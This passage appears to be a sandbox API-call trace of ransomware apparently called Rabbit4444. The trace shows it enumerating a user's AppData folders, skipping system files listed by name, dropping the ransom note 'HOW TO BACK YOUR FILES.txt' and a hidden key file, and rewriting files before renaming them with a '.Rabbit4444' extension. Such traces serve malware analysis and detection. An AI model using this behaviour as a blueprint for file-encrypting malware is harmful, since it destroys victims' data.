(lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.330] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.330] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.330] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.330] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f3e6702, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.330] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.330] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.330] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.330] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.330] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.330] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee784d5e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee784d5e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.330] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.330] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.330] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee784d5e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee784d5e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee784d5e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0062.330] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0062.330] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0062.330] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\SystemAppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\systemappdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0062.331] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x298 [0062.331] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0062.331] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.331] CloseHandle (hObject=0x298) returned 1 [0062.331] CloseHandle (hObject=0x27c) returned 1 [0062.332] GetCurrentThreadId () returned 0xd98 [0062.332] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220c8 [0062.332] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings" [0062.332] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.332] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220c0 | out: hHeap=0xe0000) returned 1 [0062.332] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings" [0062.332] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\" [0062.332] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" [0062.332] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0062.337] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0062.339] FlushFileBuffers (hFile=0x27c) returned 1 [0062.340] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0062.341] CloseHandle (hObject=0x27c) returned 1 [0062.342] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings") returned 90 [0062.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0062.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9154838f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee7aadc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0062.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.342] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.342] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0062.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0062.342] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9154838f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7138b2cd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xee7aadc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.342] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.342] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0062.342] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0062.342] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0062.342] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0062.342] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee7aadc6, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee7aadc6, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee7aadc6, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0062.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0062.342] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0062.342] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9162d1b2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x9162d1b2, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x9162d1b2, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2="Rabbit4444.exe") returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2=".") returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2="..") returned 1 [0062.342] lstrcmpiW (lpString1="roaming.lock", lpString2="windows") returned -1 [0062.343] lstrcmpiW (lpString1="roaming.lock", lpString2="bootmgr") returned 1 [0062.343] lstrcmpiW (lpString1="roaming.lock", lpString2="pagefile.sys") returned 1 [0062.343] lstrcmpiW (lpString1="roaming.lock", lpString2="boot") returned 1 [0062.343] lstrcmpiW (lpString1="roaming.lock", lpString2="ids.txt") returned 1 [0062.343] lstrcmpiW (lpString1="roaming.lock", lpString2="NTUSER.DAT") returned 1 [0062.343] lstrcpyW (in: lpString1=0x130ebee, lpString2="roaming.lock" | out: lpString1="roaming.lock") returned="roaming.lock" [0062.343] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\roaming.lock", dwFileAttributes=0x0) returned 1 [0062.344] lstrlenW (lpString="roaming.lock") returned 12 [0062.344] lstrlenW (lpString="Rabbit4444") returned 10 [0062.344] lstrcmpiW (lpString1="aming.lock", lpString2="Rabbit4444") returned -1 [0062.344] lstrlenW (lpString=".dll") returned 4 [0062.344] lstrcmpiW (lpString1="lock", lpString2=".dll") returned 1 [0062.344] lstrlenW (lpString=".lnk") returned 4 [0062.344] lstrcmpiW (lpString1="lock", lpString2=".lnk") returned 1 [0062.344] lstrlenW (lpString=".ini") returned 4 [0062.344] lstrcmpiW (lpString1="lock", lpString2=".ini") returned 1 [0062.344] lstrlenW (lpString=".sys") returned 4 [0062.344] lstrcmpiW (lpString1="lock", lpString2=".sys") returned 1 [0062.344] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9162d1b2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x6f3e6702, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xda2ea5f5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="Rabbit4444.exe") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2=".") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="..") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="windows") returned -1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="bootmgr") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="pagefile.sys") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="boot") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="ids.txt") returned 1 [0062.344] lstrcmpiW (lpString1="settings.dat", lpString2="NTUSER.DAT") returned 1 [0062.344] lstrcpyW (in: lpString1=0x130ebee, lpString2="settings.dat" | out: lpString1="settings.dat") returned="settings.dat" [0062.344] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat", dwFileAttributes=0x0) returned 1 [0062.345] lstrlenW (lpString="settings.dat") returned 12 [0062.345] lstrlenW (lpString="Rabbit4444") returned 10 [0062.345] lstrcmpiW (lpString1="ttings.dat", lpString2="Rabbit4444") returned 1 [0062.345] lstrlenW (lpString=".dll") returned 4 [0062.345] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0062.345] lstrlenW (lpString=".lnk") returned 4 [0062.345] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0062.345] lstrlenW (lpString=".ini") returned 4 [0062.345] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0062.345] lstrlenW (lpString=".sys") returned 4 [0062.345] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0062.346] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.346] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15365660688) returned 1 [0062.346] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0062.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0062.346] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0062.347] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0062.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0062.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0062.349] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0062.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.349] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0062.349] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15366020971) returned 1 [0062.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0062.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0062.350] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.350] CloseHandle (hObject=0x260) returned 1 [0062.350] CloseHandle (hObject=0x298) returned 1 [0062.350] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444") returned 114 [0062.350] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat.rabbit4444"), dwFlags=0x1) returned 1 [0062.350] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda0ae1c0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda0ae1c0, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda0ae1c0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="Rabbit4444.exe") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2=".") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="..") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="windows") returned -1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="bootmgr") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="pagefile.sys") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="boot") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="ids.txt") returned 1 [0062.351] lstrcmpiW (lpString1="settings.dat.LOG1", lpString2="NTUSER.DAT") returned 1 [0062.351] lstrcpyW (in: lpString1=0x130ebee, lpString2="settings.dat.LOG1" | out: lpString1="settings.dat.LOG1") returned="settings.dat.LOG1" [0062.351] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x22) returned 1 [0062.352] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1", dwFileAttributes=0x6) returned 1 [0062.352] lstrlenW (lpString="settings.dat.LOG1") returned 17 [0062.352] lstrlenW (lpString="Rabbit4444") returned 10 [0062.352] lstrcmpiW (lpString1="s.dat.LOG1", lpString2="Rabbit4444") returned 1 [0062.352] lstrlenW (lpString=".dll") returned 4 [0062.352] lstrcmpiW (lpString1="LOG1", lpString2=".dll") returned 1 [0062.352] lstrlenW (lpString=".lnk") returned 4 [0062.352] lstrcmpiW (lpString1="LOG1", lpString2=".lnk") returned 1 [0062.352] lstrlenW (lpString=".ini") returned 4 [0062.352] lstrcmpiW (lpString1="LOG1", lpString2=".ini") returned 1 [0062.352] lstrlenW (lpString=".sys") returned 4 [0062.352] lstrcmpiW (lpString1="LOG1", lpString2=".sys") returned 1 [0062.352] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat.log1"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0062.352] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0062.352] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15366313212) returned 1 [0062.352] GetFileSizeEx (in: hFile=0x298, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=8192) returned 1 [0062.352] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0062.353] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0062.353] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2300, lpName=0x0) returned 0x260 [0062.356] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2300) returned 0x70000 [0062.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0062.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0062.357] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0062.358] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0062.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0062.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0062.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0062.358] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15366863469) returned 1 [0062.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0062.358] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0062.358] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0062.358] CloseHandle (hObject=0x260) returned 1 [0062.358] CloseHandle (hObject=0x298) returned 1 [0062.358] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444") returned 119 [0062.358] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat.log1"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxGameCallableUI_cw5n1h2txyewy\\Settings\\settings.dat.LOG1.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxgamecallableui_cw5n1h2txyewy\\settings\\settings.dat.log1.rabbit4444"), dwFlags=0x1) returned 1 [0062.359] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xda0ae1c0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xda0ae1c0, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xda0ae1c0, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="Rabbit4444.exe") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2=".") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="..") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="windows") returned -1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="bootmgr") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="pagefile.sys") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="boot") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="ids.txt") returned 1 [0062.359] lstrcmpiW (lpString1="settings.dat.LOG2", lpString2="NTUSER.DAT") returned 1 [0062.359] lstrcpyW (in: lpString1=0x130ebee, lpString2="settings.dat.LOG2" | out: lpString1="settings.dat.LOG2") returned="settings.dat.LOG2" [0062.359] SetFileAttributesW 